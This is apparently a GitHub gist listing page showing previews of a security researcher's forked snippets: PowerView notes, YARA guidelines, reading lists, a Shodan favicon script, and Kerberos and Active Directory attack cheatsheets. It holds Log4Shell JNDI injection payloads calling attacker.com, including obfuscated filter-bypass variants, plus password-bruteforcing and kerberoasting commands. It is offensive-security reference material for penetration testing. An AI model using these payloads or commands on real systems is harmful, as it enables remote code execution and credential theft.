Skip to content

Instantly share code, notes, and snippets.

View cyberheartmi9's full-sized avatar
:octocat:
Breaking stuff

PikaChu cyberheartmi9

:octocat:
Breaking stuff
View GitHub Profile
@cyberheartmi9
cyberheartmi9 / PowerView-3.0-tricks.ps1
Created January 12, 2022 11:01 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set

This Gist has been transfered into a Github Repo. You'll find the most recent version here.

YARA Performance Guidelines

When creating your rules for YARA keep in mind the following guidelines in order to get the best performance from them. This guide is based on ideas and recommendations by Victor M. Alvarez and WXS.

  • Revision 1.4, October 2020, applies to all YARA versions higher than 3.7
${jndi:ldap://attacker.com/a}
/$%7bjndi:ldap:/$%7blower:/%7dx.x.x.x/o=tomcat%7d$%7blower:/%7d/
${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:ldap://localhost:12345/Exploit}
${jndi:${lower:l}${lower:d}a${lower:p}://loc${upper:a}lhost:1389/rce}
https://github.com/HolyBugx/HolyTips
https://www.apiopscycles.com/api-audit-checklist
https://github.com/inonshk/31-days-of-API-Security-Tips
https://github.com/shieldfy/API-Security-Checklist
https://web.archive.org/web/20210607123429/https://www.binarybrotherhood.io/oauth2_threat_model.html
https://assets.pentesterlab.com/jwt_security_cheatsheet/jwt_security_cheatsheet.pdf
https://cheatsheetseries.owasp.org/cheatsheets/Microservices_security.html
https://cheatsheetseries.owasp.org/cheatsheets/GraphQL_Cheat_Sheet.html
https://apisecurity.io/encyclopedia/content/owasp-api-security-top-10-cheat-sheet-a4.pdf
https://cheatsheetseries.owasp.org/cheatsheets/REST_Assessment_Cheat_Sheet.html
#!/usr/bin/python
import mmh3
import requests
#requests.packages.urllib3.disable_warnings()
import shodan
url="https://www.acronis.com/en-us/favicon.ico"
https://medium.com/android-news/hacking-android-app-with-frida-a85516f4f8b7
https://cmrodriguez.me/blog/frida-scripting-guide/
https://notsosecure.com/pentesting-android-apps-using-frida/
https://11x256.github.io/Frida-hooking-android-part-1
https://payatu.com/blog/amit/Getting%20_started_with_Frida
https://zhuanlan.zhihu.com/p/157604388
https://corellium.com/blog/android-frida-finding-hooks
https://frida.re/docs/javascript-api/
https://www.fatalerrors.org/a/java-runtime-for-advanced-usage-of-frida-hook-android-app.html
https://www.nowsecure.com/blog/2017/04/27/owasp-ios-crackme-tutorial-frida/
@cyberheartmi9
cyberheartmi9 / kerberos_attacks_cheatsheet.md
Created March 21, 2021 12:05 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys
========================================================================================================================
Kerberos Attacks
========================================================================================================================
[+] Kerbose attack
./GetUserSPNs.py -dc-ip 192.168.168.10 sittingduck.info/notanadmin
@cyberheartmi9
cyberheartmi9 / Active Directory Attacks.md
Created February 27, 2021 22:11 — forked from ssstonebraker/Active Directory Attacks.md
Active Directory Attacks #oscp